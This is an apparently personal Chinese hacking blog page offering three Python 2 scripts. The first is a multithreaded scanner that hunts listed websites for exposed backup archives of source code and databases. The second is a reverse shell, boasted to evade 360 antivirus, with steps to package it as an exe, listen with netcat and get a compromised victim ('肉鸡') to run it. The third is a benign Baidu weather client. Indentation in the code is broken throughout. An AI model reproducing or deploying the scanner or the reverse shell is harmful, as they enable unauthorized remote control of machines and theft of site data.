AZ0NE

关于我

网络安全爱好者

好多人都应该用过传说中的马蜂窝的挖掘鸡,当年可火了,是批量扫源码的利器,现在好多都不能用了,我就用python写个玩玩

首先得把你收集的网址存在文件目录的host.txt文件里,最好写完整URL

我在测试的时候发现了问题,有些网站防爬虫会自动跳转,所以代码里检测文件只有大于1M的源码文件才会输出

补一下github地址:https://github.com/az0ne/digger

__author__ = 'AZONE'
import Queue
import urllib2
from threading import Thread
import sys
import httplib
import urlparse
def bThread(taget):
    SETTHREAD = 800
print '[Note] Running...\n'
threadl = []
    queue = Queue.Queue()
    hosts = taget
for host in hosts:
        queue.put(host)

    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
for t in threadl:
        t.start()
for t in threadl:
        t.join()

class tThread(Thread):

def __init__(self, queue):
        Thread.__init__(self)
self.queue = queue

def run(self):
while not self.queue.empty():
            host = self.queue.get()
try:
#print host+":"+PORT1
requesturl(host)
except:
continue
taget =[]
fd = file( "host.txt", "r" )
for line in fd.readlines():
if line[0:4] == "http":
        taget.append(line.strip()+"/")
else:
        taget.append("http://"+line.strip()+"/")
print taget
print "[Note] Thread:800"
dirs = ["wwwroot.zip","wwwroot.rar","www.rar","www.zip","web.rar","web.zip","db.rar","db.zip","wz.rar","wz.zip","fdsa.rar","fdsa.zip","wangzhan.rar","wangzhan.zip","root.rar","root.zip","admin.rar","admin.zip","data.rar","gg.rar","vip.rar","1.zip","1.rar","2.zip","2.rar","config.rar","config.zip","/config/config.rar","/config/config.zip"]
def requesturl(taget):
for i in range(29):
        TURL = taget + dirs[i]
        request = urllib2.Request(TURL)
try:
            response = urllib2.urlopen(request)
back = response.read()
#print "[%d] => %s" %(response.code,TURL)
response.close()
            parsedurl = urlparse.urlparse(TURL)
            httpConn = httplib.HTTPConnection(parsedurl[1])
            httpConn.request('GET', parsedurl[2])
            responsed = httpConn.getresponse()
if responsed.status == 200:
                size = responsed.getheader('Content-Length')
                size = int(size) / 1024
if size > 1024:
print TURL+'\n'
print 'Size: %s KB' %size

except urllib2.HTTPError as error:
#print TURL+"ERROR!"
pass
bThread(taget)
sys.exit()

可以无视360

__author__ = 'AZONE'
import subprocess,socket
HOST = '服务器ip'
PORT = 443
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send('Hello !')
while 1:
    data = s.recv(1024)
if data == "quit":break
proc = subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()
    s.send(stdoutput)
s.send('Bye !')
s.close()

用pyinstaller打包成exe 参数 PyInstaller -F -w shell.py

在服务器上用NETCAT监听  netcat -l -p 443

让肉鸡运行刚刚生成的exe

调用了百度天气预报API

 

#coding=utf-8
import urllib
from xml.parsers.expat import ParserCreate
import sys
class ParserXML(object):
    
    def start_element(self, name, attrs):
        print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))

    def end_element(self, name):
        print('sax:end_element: %s' % name)

    def char_data(self, text):
        print('sax:char_data: %s' % text)
city = raw_input()
city = city.decode(sys.stdin.encoding).encode('utf-8')
part1 = "http://api.map.baidu.com/telematics/v3/weather?location="
part2 = "&output=xml&ak=A95b994530a76ed90228f0cdbe1ef540"
url = part1+city+part2
print url
#xml = urllib.urlopen('http://api.map.baidu.com/telematics/v3/weather?location=哈尔滨&output=xml&ak=A95b994530a76ed90228f0cdbe1ef540').read()
xml = urllib.urlopen(url).read()
handler = ParserXML()
parser = ParserCreate()
parser.returns_unicode = True
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data

parser.Parse(xml)

© AZ0NE | Powered by LOFTER